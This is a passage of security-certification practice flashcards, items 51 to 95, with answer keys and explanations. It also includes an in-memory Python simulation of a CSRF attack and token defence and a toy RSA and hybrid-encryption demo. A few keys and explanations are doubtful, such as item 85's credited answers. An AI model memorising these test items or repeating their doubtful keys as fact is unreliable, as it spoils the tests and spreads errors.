❍ B. Access Control Lists
❍ C. Network segmentation
❍ D. Proper VLAN management

A

Answer D is correct. VLANs provide a way to limit broadcast traffic in a
switched network. This creates a boundary and, in essence, creates multiple,
isolated LANs on one switch, so the business units can be separated without
buying additional hardware. Answer A is incorrect because logging is the
process of collecting data to be used for monitoring and auditing purposes; it
records improper access but does not prevent it. Answer B is incorrect because
access control lists generally refer to the process of making resources
available to accounts that should have access while limiting that access to
only what is required. Answer C is incorrect because physical network
segmentation is used for interconnected networks where one compromised
system on one network can easily spread to other networks, and it would require
additional switches.

52
Q
  1. Your organization is exploring data loss prevention solutions. The proposed solution
    is a software network solution installed near the network perimeter to monitor for and flag policy violations. This solution is targeting which of the following data states?

❍ A. In motion
❍ B. At rest
❍ C. In use
❍ D. At flux

A

Answer A is correct. Protection of data in motion is considered to be a network
solution, and either a hardware or software solution is installed near the network
perimeter to monitor for and flag policy violations. Answer B is incorrect
because protection of data at rest is considered to be a storage solution and is
generally a software solution that monitors how confidential data is stored.
Answer C is incorrect because protection of data in use is considered to be an
endpoint solution and the application is run on end-user workstations or servers
in the organization. Answer D is incorrect because there is no such data state.

53
Q
  1. What is the first step in performing a basic forensic analysis?

❍ A. Ensure that the evidence is acceptable in a court of law
❍ B. Identify the evidence
❍ C. Extract, process, and interpret the evidence
❍ D. Determine how to preserve the evidence

A

Answer B is correct. It is necessary to first identify the evidence that is available
to be collected. Answer A is incorrect because protecting the data’s value
as evidence must come after the type and form of evidence is known.
Extraction, preservation, processing, and interpretation of evidence also follow
the identification of data types and storage that must be collected, making
answers C and D incorrect.

54
Q
  1. Which of the following is not true regarding expiration dates of certificates?

❍ A. Certificates may be issued for a week.
❍ B. Certificates are issued only at yearly intervals.
❍ C. Certificates may be issued for 20 years.
❍ D. Certificates must always have an expiration date.

A

Answer B is correct. Digital certificates contain a validity field (notAfter)
indicating the date until which the certificate is valid. This date is mandatory,
and the validity period can vary from a short period of time up to a number of
years; therefore, answers A, C, and D are incorrect.

55
Q
  1. Which of the following statements are true when discussing physical security?
    (Select all correct answers.)

❍ A. Physical security attempts to control access to data from Internet
users.
❍ B. Physical security attempts to control unwanted access to specified
areas of a building.
❍ C. Physical security attempts to control the effect of natural disasters on
facilities and equipment.
❍ D. Physical security attempts to control internal employee access into
secure areas.

A

Answers B, C, and D are correct. Natural disasters, unwanted access, and user
restrictions are all physical security issues. Preventing Internet users from getting
to data is data security, not physical security; therefore, answer A is incorrect.

56
Q
  1. Which type of authorization provides no mechanism for unique logon
    identification?

❍ A. Anonymous
❍ B. Kerberos
❍ C. TACACS
❍ D. TACACS+

A

Answer A is correct. During anonymous access, such as requests to a public
FTP server, the unique identity of the requester is not determined and so cannot
be used for personalized logon identification. Answers B, C, and D are incorrect
because authorization services such as Kerberos, TACACS, and its
replacement TACACS+ all verify access requests against a list of authorized
credentials and so can log individual visits and identify access request logons.

57
Q
  1. Which is the best rule-based access control constraint to protect against unauthorized access when admins are off-duty?

❍ A. Least privilege
❍ B. Separation of duties
❍ C. Account expiration
❍ D. Time of day

A

Answer D is correct. Time of day rules prevent administrative access requests
during off-hours when local admins and security professionals are not on duty.
Answer A is incorrect because least privilege is a principle of assigning only
those rights necessary to perform assigned tasks. Answer B is incorrect
because separation of duties aids in identification of fraudulent or incorrect
processes by ensuring that action and validation practices are performed separately.
Answer C is incorrect because account expiration protocols ensure that
individual accounts do not remain active past their designated lifespan but do
nothing to ensure protections are enabled during admin downtime.

58
Q
  1. Which of the following protocols supports DES, 3DES, RC2, and RSA2 encryption along with CHAP authentication, but was not widely adopted?

❍ A. S-HTTP
❍ B. S/MIME
❍ C. HTTP
❍ D. PPTP

A

Answer A is correct. An alternative to HTTPS is the Secure Hypertext
Transfer Protocol (S-HTTP), which was developed to support connectivity
for banking transactions and other secure web communications. S-HTTP was
not adopted by the early web browser developers (for example, Netscape and
Microsoft) and so remains less common than the HTTPS standard.
Additionally, S-HTTP encrypts individual messages so it cannot be used for
VPN security. Answer B is incorrect. S/MIME is used to encrypt electronic
mail transmissions over public networks. Answer C is incorrect because
HTTP is used for unsecured web-based communications. Answer D is incorrect
because Point-to-Point Tunneling Protocol (PPTP) is a network protocol
that enables the secure transfer of data from a remote client to a private enterprise
server by creating a virtual private network (VPN) across TCP/IP-based
data networks.

59
Q
  1. A new switch has been implemented in areas where there is very little physical access control. Which of the following would the organization implement as a method for additional checks in order to prevent unauthorized access?

❍ A. Loop protection
❍ B. Flood guard
❍ C. Implicit deny
❍ D. Port security

A

Answer D is correct. Port security is a Layer 2 traffic control feature on Cisco
Catalyst switches. It enables individual switch ports to be configured to allow
only a specified number of source MAC addresses coming in through the
port. Answer A is incorrect because the loop guard feature makes additional
checks in Layer 2 switched networks. Answer B is incorrect because a flood
guard is a firewall feature to control network activity associated with
denial-of-service attacks (DoS). Answer C is incorrect because implicit deny is an
access control practice wherein resource availability is restricted to only those
logons explicitly granted access.

60
Q
  1. There have been some sporadic connectivity issues on the network. Which of the following is the best choice to investigate these issues?

❍ A. Protocol analyzer
❍ B. Circuit-level gateway logs
❍ C. Spam filter appliance
❍ D. Web application firewall logs

A

Answer A is correct. Protocol analyzers help you troubleshoot network issues
by gathering packet-level information across the network. These applications
capture packets and can conduct protocol decoding, putting the information
into readable data for analysis. Answer B is incorrect because a circuit-level
gateway works at the session layer, validating TCP handshakes and relaying
connections; its logs record which sessions were allowed, not the packet-level
detail needed to diagnose intermittent faults. Answer C is incorrect
because all-in-one spam filter appliances allow for checksum technology,
which tracks the number of times a particular message has appeared, and message
authenticity checking, which uses multiple algorithms to verify authenticity
of a message. Answer D is incorrect because a web application firewall is
software or a hardware appliance used to protect the organization’s web server
from attack.

61
Q
  1. Which of the following types of attacks can be done by either convincing the users to click on an HTML page the attacker has constructed or insert arbitrary HTML in a target website that the users visit?

❍ A. Buffer overflow
❍ B. Cross-site request forgery (XSRF)
❍ C. Cross-site scripting (XSS)
❍ D. Input validation error

A

Answer B is correct. The key element to understanding XSRF is that attackers
are betting that users have a validated login cookie for the website already
stored in their browsers. All they need to do is get the browsers to make a
request to the website on their behalf. This can be done by either convincing
the users to click on an HTML page the attacker has constructed or inserting
arbitrary HTML in a target website that the users visit. Answer A is incorrect
because a buffer overflow is a direct result of poor or incorrect input validation
or mishandled exceptions. Answer C is incorrect because cross-site scripting
(XSS) vulnerabilities can be used to hijack the user’s session or to cause
the user accessing malware-tainted Site A to unknowingly attack Site B on
behalf of the attacker who planted code on Site A. Answer D is incorrect
because input validation errors are a result of improper field checking in the
code.
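
Added example (not from the original flashcards): the explanation above rests on one fact, that the browser attaches the victim's session cookie to a form post no matter which site the form came from. The Python below models a bank transfer handler as an in-memory function, first checking only the cookie and then also requiring the per-session synchronizer token the attacker's page cannot read, and runs a constructed forged request and a constructed legitimate request through both. The session store, the account names and the request shape are assumptions made for the demonstration.

```python
import hmac
import secrets

# Constructed in-memory state standing in for a web application (example only).
SESSIONS = {}   # session id -> {"user": ..., "csrf": ...}
BALANCES = {}   # account -> balance


def login(user: str) -> str:
    """Create a session; the CSRF token is random and bound to this session."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def _do_transfer(sender: str, form: dict) -> str:
    amount = int(form["amount"])
    if BALANCES.get(sender, 0) < amount:
        return "402 insufficient funds"
    BALANCES[sender] -= amount
    BALANCES[form["to"]] = BALANCES.get(form["to"], 0) + amount
    return "200 ok"


def transfer_vulnerable(request: dict) -> str:
    """Vulnerable: a valid session cookie is the only thing checked, and the
    browser attaches that cookie to cross-site form posts automatically."""
    session = SESSIONS.get(request["cookies"].get("sid"))
    if session is None:
        return "401 not logged in"
    return _do_transfer(session["user"], request["form"])


def transfer_hardened(request: dict) -> str:
    """Hardened: the form must also carry the session's CSRF token, which the
    attacker's page cannot read or guess (synchronizer token pattern)."""
    session = SESSIONS.get(request["cookies"].get("sid"))
    if session is None:
        return "401 not logged in"
    submitted = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(submitted, session["csrf"]):
        return "403 csrf token missing or invalid"
    return _do_transfer(session["user"], request["form"])


def forged_request(sid: str) -> dict:
    """What the victim's browser sends after loading the attacker's auto-submitting
    form: the victim's cookie rides along, but the attacker chose the fields."""
    return {"cookies": {"sid": sid}, "form": {"to": "mallory", "amount": "50"}}


def legitimate_request(sid: str) -> dict:
    """The bank's own form embeds the token the server issued for this session."""
    return {"cookies": {"sid": sid},
            "form": {"to": "bob", "amount": "10", "csrf_token": SESSIONS[sid]["csrf"]}}


def run_scenarios() -> dict:
    """Forged request against both handlers, then a legitimate one against the
    hardened handler; returns the outcomes and final balances."""
    SESSIONS.clear()
    BALANCES.clear()
    BALANCES.update({"alice": 100, "bob": 0, "mallory": 0})
    sid = login("alice")
    return {
        "forged_vs_vulnerable": transfer_vulnerable(forged_request(sid)),
        "forged_vs_hardened": transfer_hardened(forged_request(sid)),
        "legitimate_vs_hardened": transfer_hardened(legitimate_request(sid)),
        "balances": dict(BALANCES),
    }


if __name__ == "__main__":
    for key, value in run_scenarios().items():
        print(f"{key}: {value}")
```

In a real deployment the token check is layered with a SameSite attribute on the session cookie and an Origin or Referer check on state-changing requests; the token alone is what turns the forged post from "200 ok" into "403".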

62
Q
  1. Which of the following standards is used in HSMs?

❍ A. PKCS #11
❍ B. PKCS #7
❍ C. AES
❍ D. EFS

A

Answer A is correct. The PKCS #11 standard provides for access to public
and private asymmetric keys, symmetric keys, X.509 certificates, and
application data. PKCS #11 is the de facto standard for platform applications,
although some newer HSMs include more advanced authentication and
authorization models. Answer B is incorrect because PKCS #7 Cryptographic
Message Syntax Standard describes the syntax for data streams such as digital
signatures that may have cryptography applied to them. Answer C is incorrect
because AES is a symmetric block cipher, an algorithm an HSM may implement, not
an interface standard that defines how applications access the module. Answer D is
incorrect because EFS is the encrypting file system available in newer
Microsoft operating systems.

63
Q
  1. Which of the following algorithms is not an example of a symmetric encryption
    algorithm?

❍ A. Rijndael
❍ B. Diffie-Hellman
❍ C. RC6
❍ D. AES

A

Answer B is correct. Diffie-Hellman is a public-key (asymmetric) key agreement
protocol: each party holds a private value and publishes a public value, and the
exchange establishes a shared secret rather than encrypting bulk data. Because AES
is the standardized form of Rijndael (Rijndael with a fixed 128-bit block size),
both names refer to the same symmetric block cipher; therefore, answers A and D
are incorrect. Answer C is incorrect because RC6 is a symmetric block cipher, too.

64
Q
  1. Which of the following best describes the process of encrypting and decrypting
    data using an asymmetric encryption algorithm?

❍ A. Only the public key is used to encrypt, and only the private key is
used to decrypt.
❍ B. The public key is used to either encrypt or decrypt.
❍ C. Only the private key is used to encrypt, and only the public key is
used to decrypt.
❍ D. The private key is used to decrypt data encrypted with the public key.

A

Answer D is correct. When encrypting and decrypting data using an asymmetric
encryption algorithm, only the private key can decrypt data that was encrypted
with the public key. Answers A and B are both incorrect because in public key
encryption, if one key is used to encrypt, you can use the other to decrypt the
data (the private-to-public direction is how digital signatures work). Answer C
is incorrect because the public key is not used to decrypt the same data it
encrypted.

65
Q
  1. Which one of the following defines APIs for devices such as smart cards that contain cryptographic information?

❍ A. PKCS #11
❍ B. PKCS #13
❍ C. PKCS #4
❍ D. PKCS #2

A

Answer A is correct. PKCS #11, the Cryptographic Token Interface
Standard, defines an API named Cryptoki for devices holding cryptographic
information, such as smart cards and HSMs. Answer B is incorrect because PKCS #13
is the Elliptic Curve Cryptography Standard. Both answers C and D are incorrect
because PKCS #4 and PKCS #2 no longer exist and have been integrated into
PKCS #1, the RSA Cryptography Standard.

66
Q
  1. Which of the following are steps that can be taken to harden FTP services?

❍ A. Anonymous access to share files of questionable or undesirable content
should be limited.
❍ B. Regular review of networks for unauthorized or rogue servers.
❍ C. Technologies that allow dynamic updates must also include access
control and authentication.
❍ D. Unauthorized zone transfers should also be restricted.

A

Answer A is correct. Anonymous access to share files of questionable or undesirable
content should be limited for proper FTP server security. Answer B is
incorrect because it is a hardening practice for DHCP services. Answers C
and D are incorrect because they are associated with hardening DNS service.

67
Q
  1. A situation in which a program or process attempts to store more data in a temporary
    data storage area than it was intended to hold is known as a what?

❍ A. Buffer overflow
❍ B. Denial of service
❍ C. Distributed denial of service
❍ D. Storage overrun

A

Answer A is correct. A buffer overflow occurs when a program or process
attempts to store more data in a buffer than the buffer was intended to hold.
The excess data flows into adjacent memory, overwriting or corrupting whatever
is stored there. A denial of service is a type of attack in which too much
traffic is sent to a host, preventing it from responding to legitimate traffic.
A distributed denial of service is similar, but it is initiated through multiple
hosts; therefore, answers B and C are incorrect. Answer D sounds plausible, but
"storage overrun" is not the accepted term for this condition.

68
Q
  1. TEMPEST deals with which form of environmental control?

❍ A. HVAC
❍ B. EMI shielding
❍ C. Humidity
❍ D. Cold-aisle

A

Answer B is correct. TEMPEST protections involve the hardening of
equipment against EMI broadcast and sensitivity. Answers A and C are incorrect
because HVAC controls include temperature and humidity management
techniques to manage evolved heat in the data center and to minimize static
charge buildup. Answer D is incorrect because hot-aisle/cold-aisle schemes
provide thermal management for data centers by grouping air intakes on cold
aisles and air exhausts on designated hot aisles, making HVAC more effective.

69
Q
  1. Which of the following is included in hardening a host operating system?

❍ A. A policy for antivirus updates
❍ B. A policy for remote wipe
❍ C. An efficient method to connect to remote sites
❍ D. An effective system for file-level security

A

Answer D is correct. Hardening of the operating system includes planning
against both accidental and directed attacks, such as the use of fault-tolerant
hardware and software solutions. In addition, it is important to implement an
effective system for file-level security, including encrypted file support and
secured file system selection that allows the proper level of access control.
Answer A is incorrect because it is a host protection measure, not an OS hardening
measure. Answer B is incorrect because this is a feature associated with
data security, not host hardening. Answer C is incorrect because this is a
secure communication measure.

70
Q
  1. Which of the following is the preferred type of encryption used in SaaS platforms?

❍ A. Application level
❍ B. Database level
❍ C. Media level
❍ D. HSM level

A

Answer A is correct. In an SaaS environment, application-level encryption is
preferred because the data is encrypted by the application before being stored
in the database or file system. The advantage is that it protects the data from
the user all the way to storage. Answer B is incorrect because in cloud implementations
data should be encrypted at the application layer rather than
within a database due to the complexity involved, and media encryption is
managed at the storage layer. Answer C is incorrect because encryption of a
complete virtual machine on IaaS could be considered media encryption.
Answer D is incorrect because an HSM solution is mainly found in private
datacenters that manage and offload cryptography with dedicated hardware
appliances.

71
Q
  1. Several organizational users are experiencing network and Internet connectivity issues. Which of the following would be most helpful in troubleshooting where the connectivity problems might exist?

❍ A. SSL
❍ B. IPsec
❍ C. SNMP
❍ D. Traceroute

A

Answer D is correct. Traceroute sends a series of probes with increasing IP
time-to-live (TTL) values (ICMP echo requests in Windows tracert, UDP datagrams
by default on Unix-like systems) and uses the ICMP Time Exceeded replies from
each hop to map the path between two addresses, showing where latency or loss
begins. Answer A is incorrect because SSL is a public key-based security
protocol that is used by Internet services and clients for authentication,
message integrity, and confidentiality. Answer B is incorrect because the
Internet Protocol Security (IPsec) authentication and encapsulation standard is
widely used to establish secure VPN communications. Answer C is incorrect
because SNMP is an application layer protocol whose purpose is to collect
statistics from TCP/IP devices. SNMP is used for monitoring the health of
network equipment, computer equipment, and devices such as uninterruptible
power supplies (UPSs).

72
Q
  1. An organization has an access control list implemented on the border router, but
    it appears that unauthorized traffic is still being accepted. Which of the following
    would the organization implement to improve the blocking of unauthorized traffic?

❍ A. Loop protection
❍ B. Flood guard
❍ C. Implicit deny
❍ D. Port security

A

Answer C is correct. Implicit deny is an access control practice wherein
resource availability is restricted to only those logons explicitly granted access.
Answer A is incorrect because the loop guard feature makes additional checks
in Layer 2 switched networks. Answer B is incorrect because a flood guard is a
firewall feature to control network activity associated with denial of service
attacks (DoS). Answer D is incorrect because port security is a Layer 2 traffic
control feature on Cisco Catalyst switches. It enables individual switch ports
to be configured to allow only a specified number of source MAC addresses
coming in through the port.

73
Q
  1. An asset is valued at $12,000; the threat exposure factor of a risk affecting that
    asset is 25%; and the annualized rate of occurrence is 50%. What is the SLE?

❍ A. $1,500
❍ B. $3,000
❍ C. $4,000
❍ D. $6,000

A

Answer B is correct. The single loss expectancy (SLE) is the product of the
asset value ($12,000) and the exposure factor (.25), or $3,000. Answer A is
incorrect because $1,500 represents the annualized loss expectancy (ALE), which
is the product of the SLE and the annualized rate of occurrence (ARO):
$3,000 × .5. Answers C and D are incorrect calculated values.

74
Q
  1. Which form of fire suppression functions best in an Alaskan fire of burning metals?

❍ A. Dry-pipe sprinkler
❍ B. Wet-pipe sprinkler
❍ C. Carbon dioxide
❍ D. Dry powder

A

Answer D is correct. Combustible metal fires (Class D) require sodium chloride
and copper-based dry powder extinguishers. Although dry-pipe would be
preferable to wet-pipe sprinklers in regions that experience very low temperatures
such as Alaska, water is only appropriate for wood, paper, and trash fires
(Class A), making answers A and B incorrect. Answer C is incorrect because
carbon dioxide and Halon extinguishers are useful for fires involving live electric
wiring (Class C) and would not be used for burning metals.

75
Q
  1. While performing regular security audits, you suspect that your company is under attack and someone is attempting to use resources on your network. The IP addresses in the log files belong to a trusted partner company, however. Assuming an attack, which of the following might be occurring?

❍ A. Replay
❍ B. Authorization
❍ C. Social engineering
❍ D. Spoofing

A

Answer D is correct. The most likely answer is spoofing because this enables an
attacker to misrepresent the source of the requests. Answer A is incorrect
because this type of attack records and replays previously sent valid messages.
Answer B is incorrect because this is not a type of attack but is instead the
granting of access rights based on authentication. Answer C is incorrect because
social engineering involves the nontechnical means of gaining information.

76
Q
  1. Which mandatory access control label is appropriate for generally available data?

❍ A. ANONYMOUS
❍ B. PUBLIC
❍ C. SENSITIVE
❍ D. SECRET

A

Answer B is correct. The PUBLIC label can be applied to generally available
data within MAC access control environments. Answer A is incorrect because
the ANONYMOUS method of authorization is not available in MAC environments
because it lacks logon identification. Answers C and D are incorrect
because the SENSITIVE and SECRET labels indicate access control limitations
that are more restrictive than PUBLIC.

77
Q
  1. After a new switch was implemented, some sporadic connectivity issues on the network have occurred. The issues are suspected to be device related. Which of the following would the organization implement as a method for additional checks in order to prevent issues?

❍ A. Loop protection
❍ B. Flood guard
❍ C. Implicit deny
❍ D. Port security

A

Answer A is correct. The loop guard feature makes additional checks in Layer
2 switched networks. Answer B is incorrect because a flood guard is a firewall
feature to control network activity associated with denial-of-service attacks
(DoS). Answer C is incorrect because implicit deny is an access control practice
wherein resource availability is restricted to only those logons explicitly
granted access. Answer D is incorrect because port security is a Layer 2 traffic
control feature on Cisco Catalyst switches. It enables individual switch ports
to be configured to allow only a specified number of source MAC addresses
coming in through the port.

78
Q
  1. Which of the following is an example of a false negative result?

❍ A. An authorized user is granted access to a resource.
❍ B. An unauthorized user is granted access to a resource.
❍ C. An authorized user is refused access to a resource.
❍ D. An unauthorized user is refused access to a resource.

A

Answer C is correct. A false negative result involves access refusal for an
authorized user, which makes answer D incorrect. Answers A and B are incorrect
because they represent granted resource access.

79
Q
  1. Which of the following is the best choice for encrypting large amounts of data?

❍ A. Asymmetric encryption
❍ B. Symmetric encryption
❍ C. Elliptical curve encryption
❍ D. RSA encryption

A

Answer B is correct. Public key encryption is not usually used to encrypt large
amounts of data, but it does provide an effective and efficient means of sending
a secret key from which to do symmetric encryption thereafter, which
provides the best method for efficiently encrypting large amounts of data.
Therefore, answers A, C, and D are incorrect.
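
Added example (not from the original flashcards), serving both card 64 (which key encrypts, which decrypts) and card 79 (why bulk data is encrypted symmetrically): a textbook RSA key pair built from two small primes in plain Python, used first in the public-encrypt, private-decrypt direction, then in the private-sign, public-verify direction, and finally to wrap a random symmetric key for a document that is far too large to be a single RSA block. The primes, the toy SHA-256 counter-mode stream cipher and the 32-bit session key are assumptions chosen so the arithmetic stays visible; none of this is how a production library does it (real keys are 2048 bits or more and always use padding such as OAEP and PSS).

```python
import hashlib
import secrets
from math import gcd


def _is_prime(n: int) -> bool:
    """Trial division; adequate for the tiny primes this toy uses."""
    if n < 2:
        return False
    i = 2
    while i * i <= n:
        if n % i == 0:
            return False
        i += 1
    return True


def toy_rsa_keypair(p: int, q: int, e: int = 65537):
    """Textbook RSA from two small primes (assumed inputs). Demonstrates the key
    relationship only; it has none of the padding real RSA relies on."""
    assert _is_prime(p) and _is_prime(q) and p != q
    n = p * q
    phi = (p - 1) * (q - 1)
    assert gcd(e, phi) == 1
    d = pow(e, -1, phi)            # modular inverse, Python 3.8+
    return (n, e), (n, d)          # (public key, private key)


def rsa_apply(key, m: int) -> int:
    """One modular exponentiation; the same operation serves both directions."""
    n, exponent = key
    assert 0 <= m < n, "value must be smaller than the modulus"
    return pow(m, exponent, n)


def _digest_mod_n(message: bytes, n: int) -> int:
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(private, message: bytes) -> int:
    """Private key 'encrypts' the digest: only the key holder can produce this."""
    return rsa_apply(private, _digest_mod_n(message, private[0]))


def verify(public, message: bytes, signature: int) -> bool:
    """Public key reverses it: anyone can check, nobody else can forge."""
    return rsa_apply(public, signature) == _digest_mod_n(message, public[0])


def toy_stream_cipher(key: bytes, data: bytes) -> bytes:
    """XOR with a SHA-256 counter keystream; symmetric, so one call both
    encrypts and decrypts. Toy only (assumption): no authentication tag."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        keystream = hashlib.sha256(key + offset.to_bytes(8, "big")).digest()
        out.extend(a ^ b for a, b in zip(data[offset:offset + 32], keystream))
    return bytes(out)


def hybrid_encrypt(public, plaintext: bytes):
    """Wrap a random symmetric key with RSA, encrypt the bulk data symmetrically."""
    session_key = secrets.token_bytes(4)   # 32 bits: fits under the toy modulus
    wrapped = rsa_apply(public, int.from_bytes(session_key, "big"))
    return wrapped, toy_stream_cipher(session_key, plaintext)


def hybrid_decrypt(private, wrapped: int, ciphertext: bytes) -> bytes:
    session_key = rsa_apply(private, wrapped).to_bytes(4, "big")
    return toy_stream_cipher(session_key, ciphertext)


def demo() -> dict:
    public, private = toy_rsa_keypair(1000003, 1000033)
    n = public[0]
    # Card 64: encrypt with the public key, decrypt with the private key.
    m = 123456789
    roundtrip_ok = rsa_apply(private, rsa_apply(public, m)) == m
    # The other direction is a signature: private key in, public key out.
    message = b"transfer 10 to bob"
    signature = sign(private, message)
    # Card 79: a document larger than the modulus cannot be one RSA block, so the
    # asymmetric key only protects the symmetric key that encrypts the bulk data.
    document = b"Contract text that runs to kilobytes in real life. " * 40
    return {
        "public_encrypt_private_decrypt": roundtrip_ok,
        "signature_verifies": verify(public, message, signature),
        "tampered_message_verifies": verify(public, b"transfer 99 to bob", signature),
        "document_fits_in_one_rsa_block": len(document) <= (n.bit_length() - 1) // 8,
        "hybrid_roundtrip": hybrid_decrypt(private, *hybrid_encrypt(public, document)) == document,
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

With a 40-bit modulus only 4 bytes fit in one RSA operation, which is the whole reason the document goes through the symmetric cipher and only the key goes through RSA; the same division of labour holds at 2048 bits, where a single operation still covers fewer bytes than a typical file and is thousands of times slower per byte than AES.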

80
Q
  1. You want to be sure that the FTP ports that are required for a contract worker’s functionality have been properly secured. Which of the following ports would you check?

❍ A. 25/110/143
❍ B. 20/21
❍ C. 137/138/139
❍ D. 161/162

A

Answer B is correct. Ports 20 and 21 are used for FTP (21 for the control
channel, 20 for active-mode data). Answer A is incorrect
because these ports are used for email. Answer C is incorrect because these
NetBIOS ports are required for certain Windows network functions such as
file sharing. Answer D is incorrect because these ports are used for SNMP.

81
Q
  1. Security guards are a form of which specific type of control?

❍ A. Management
❍ B. Technical
❍ C. Physical
❍ D. Access

A

Answer C is correct. Physical controls include facility design details such as
layout, door, locks, guards, and surveillance systems. Management controls
include policies and procedures, whereas technical controls include access
control systems, encryption, and data classification solutions, making answers
A and B incorrect. Access controls include all three classifications: management,
technical, and physical, making answer D incorrect because the question
asks for a specific type.

82
Q
  1. Which utility allows for the compilation of a list of systems, devices, and network hardware?

❍ A. Port scanner
❍ B. Vulnerability scanner
❍ C. Protocol analyzer
❍ D. Network mapper

A

Answer D is correct. A network mapper identifies all devices within a network
segment. Port scanners check service ports on a single device, making answer
A incorrect. Answer B is incorrect because vulnerability scanners look for particular
vulnerabilities associated with versions of software or services. Answer
C is incorrect because protocol analyzers examine network traffic and identify
protocols and endpoint devices in the identified transactions.

83
Q
  1. Which one of the following is not considered a physical security component?

❍ A. VPN tunnel
❍ B. Mantrap
❍ C. Fence
❍ D. CCTV

A

Answer A is correct. A VPN tunnel is an example of data security—not physical
security. Mantrap, fence, and CCTV are all components of physical security;
therefore, answers B, C, and D are incorrect.

84
Q
  1. A physical security plan should include which of the following? (Select all correct answers.)

❍ A. Description of the physical assets being protected
❍ B. The threats from which you are protecting against and their likelihood
❍ C. Location of a hard disk’s physical blocks
❍ D. Description of the physical areas where assets are located

A

Answers A, B, and D are correct. A physical security plan should be a written
plan that addresses your current physical security needs and future direction.
With the exception of answer C, all the answers are correct and should be
addressed in a physical security plan. A hard disk’s physical blocks pertain to
the file system.

85
Q
Never inserting untrusted data except in allowed locations can be used to mitigate which of the following attacks? (Select two answers.)

❍ A. Buffer overflow
❍ B. Cross-site request forgery (XSRF)
❍ C. Cross-site scripting
❍ D. Input validation error

A

Answers A and D are correct. A buffer overflow is a direct result of poor or
incorrect input validation or mishandled exceptions, and input validation
errors are a result of improper field checking in the code. Answer B is incorrect
because Cross-site Request Forgery (XSRF) is an attack in which the end
user executes unwanted actions on a web application while he or she is currently
authenticated. Answer C is incorrect because cross-site scripting (XSS)
vulnerabilities can be used to hijack the user’s session or to cause the user
accessing malware-tainted Site A to unknowingly attack Site B on behalf of
the attacker who planted code on Site A.

86
Q
An organization is looking to add a layer of security and improve enterprise desktop management. Which of the following fulfills this requirement?

❍ A. Virtualization
❍ B. Network storage policies
❍ C. VPN remote access
❍ D. Roaming profiles

A

Answer A is correct. Virtualization adds a layer of security as well as improves
enterprise desktop management and control with faster deployment of desktops
and fewer support calls due to application conflicts. Answer B is incorrect
because network storage policies have nothing to do with desktop management.
Answer C is incorrect because VPN remote access does not improve
enterprise desktop management. Answer D is incorrect because roaming profiles
do not add a layer of security.

87
Q
Which of the following is a program that uses SSH to transfer files?

❍ A. S-HTTP
❍ B. S/MIME
❍ C. SFTP
❍ D. HTTPS

A

Answer C is correct. SFTP, or secure FTP, is a program that uses SSH to
transfer files. Unlike standard FTP, it encrypts both commands and data, preventing
passwords and sensitive information from being transmitted in the
clear over the network. Answer A is incorrect because S-HTTP is an alternative
to HTTPS, which was developed to support connectivity for banking
transactions and other secure web communications. Answer B is incorrect.
S/MIME is used to encrypt electronic mail transmissions over public networks.
Answer D is incorrect because HTTPS is used for secured web-based
communications.

88
Q
Which one of the following best describes the type of attack designed to bring a network to a halt by flooding the systems with useless traffic?

❍ A. DoS
❍ B. Ping of death
❍ C. Teardrop
❍ D. Social engineering

A

Answer A is correct. A DoS attack (or denial of service) is designed to bring
down a network by flooding the system with an overabundance of useless traffic.
Although answers B and C are both types of DoS attacks, they are incorrect
because DoS more accurately describes “a type of attack.” Answer D is
incorrect because social engineering describes the nontechnical means of
obtaining information.

89
Q
The process of making an operating system more secure by closing known vulnerabilities and addressing security issues is known as which of the following?

❍ A. Handshaking
❍ B. Hardening
❍ C. Hotfixing
❍ D. All of the above

A

Answer B is correct. Hardening refers to the process of securing an operating
system. Handshaking relates the agreement process before communication
takes place; therefore, answer A is incorrect. A hotfix is just a security patch
that gets applied to an operating system; therefore, answer C is incorrect.
Hardening is the only correct answer; therefore, answer D is incorrect.

90
Q
An organization is looking for a mobile solution that allows both executives and employees to discuss sensitive information without having to travel to secure company locations. Which of the following fulfills this requirement?

❍ A. GPS tracking
❍ B. Voice encryption
❍ C. Remote wipe
❍ D. Passcode policy

A

Answer B is correct. Mobile voice encryption can allow executives and
employees alike to discuss sensitive information without having to travel to
secure company locations. Answer A is incorrect because in the event a mobile
device is lost, GPS tracking can be used to find the location. Answer C is
incorrect because remote wipe allows a handheld’s data to be remotely deleted
in the event the device is lost or stolen. Answer D is incorrect because a
screen lock or passcode is used to prevent access to the phone.

91
Q
Users received a spam email from an unknown source and chose the option in the email to unsubscribe and are now getting more spam as a result. Which one of the following is most likely the reason?

❍ A. The unsubscribe option does not actually do anything.
❍ B. The unsubscribe request was never received.
❍ C. Spam filters were automatically turned off when making the selection
to unsubscribe.
❍ D. They confirmed that their addresses are “live.”

A

Answer D is correct. Often an option to opt out of further email does not
unsubscribe users; instead it means, “send me more spam,” because it has been
confirmed that the email address is not dormant. This is less likely to occur
with email a user receives that he or she opted into in the first place, however.
Answers A, B, and C are incorrect because these are less likely and not the
best choices.

92
Q
Which form of data storage is the most subject to modification?

❍ A. Main memory
❍ B. Write-once memory
❍ C. Routing tables
❍ D. Secondary memory

A

Answer C is correct. Only CPU registers and caches are more volatile than
routing and process tables, making answers A, B, and D incorrect as well.

93
Q
Which of the following is not an example of multifactor authentication?

❍ A. Logon and password
❍ B. Smart card and PIN
❍ C. RFID chip and thumbprint
❍ D. Gait and iris recognition

A

Answer A is correct. Both logon and password represent a form of “what you
know” authentication. Answers B, C, and D are all incorrect because they represent
paired multifactor forms of authentication. A smart card and PIN represent
what you have and know, and an RFID chip and thumbprint link what
you have with what you are. Gait is a measure of what you do, and iris details
are an example of what you are.

94
Q
Which of the following is an example of role-based access control criteria?

❍ A. GPS coordinates
❍ B. Trusted OS
❍ C. Members of the Administrators group
❍ D. Time of day

A

Answer C is correct. Role-based access control involves assignment of access
rights to groups associated with specific roles, with accounts inheriting rights
based on group membership. Answers A and B are incorrect, as requirements
for access only from specific locations or only from systems running a trusted
OS are examples of rule-based access controls. Time of day restrictions are
also rule-based access controls, making answer D incorrect.

95
Q
The sender of data is provided with proof of delivery, and neither the sender nor receiver can deny either having sent or received the data. What is this called?

❍ A. Nonrepudiation
❍ B. Repetition
❍ C. Nonrepetition
❍ D. Repudiation

A

Answer A is correct. Nonrepudiation means that neither party can deny either
